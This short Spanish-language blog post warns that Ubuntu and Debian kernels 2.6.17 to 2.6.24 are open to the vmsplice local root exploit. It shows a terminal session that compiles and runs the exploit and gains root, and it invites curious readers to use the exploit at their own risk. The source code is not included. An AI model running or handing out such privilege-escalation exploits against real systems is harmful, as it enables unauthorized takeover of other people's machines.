Existe un exploit no tan nuevo, pero seguramente de temer para los usuarios Debian/Ubuntu corriendo con un Kernel 2.6.x desde el 2.6.17 hasta el 2.6.24. Lo que lo hace realmente preocupante, es que el kernel que trae Ubuntu Gutsy Gibbon por defecto, es el 2.6.22 -14-generic que es vulnerable a esta explotación local. La buena noticia es que hay hay que saber un poquito de GCC para hacerlo funcionar correctamente y ta ves no cualquier usuario pueda explotar nuestro sistema. Para muestra un botón:
zilus@hackbox:~/$ uname -a
Linux hackbox 2.6.22-14-generic #1 SMP Tue Feb 12 07:42:25 UTC 2008 i686 GNU/Linux
$ gcc exploit.c -o exploit
$ whoami
zilus
$ ./exploit
——-——-——-——-
Linux vmsplice Local Root Exploit
By qaaz
——-——-——-——-——-
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Si aun siguen curiosos, les dejo el exploit a la mano… úsenlo bajo su responsabilidad. Gracias a milw0rm.com por el tip.
Recent Comments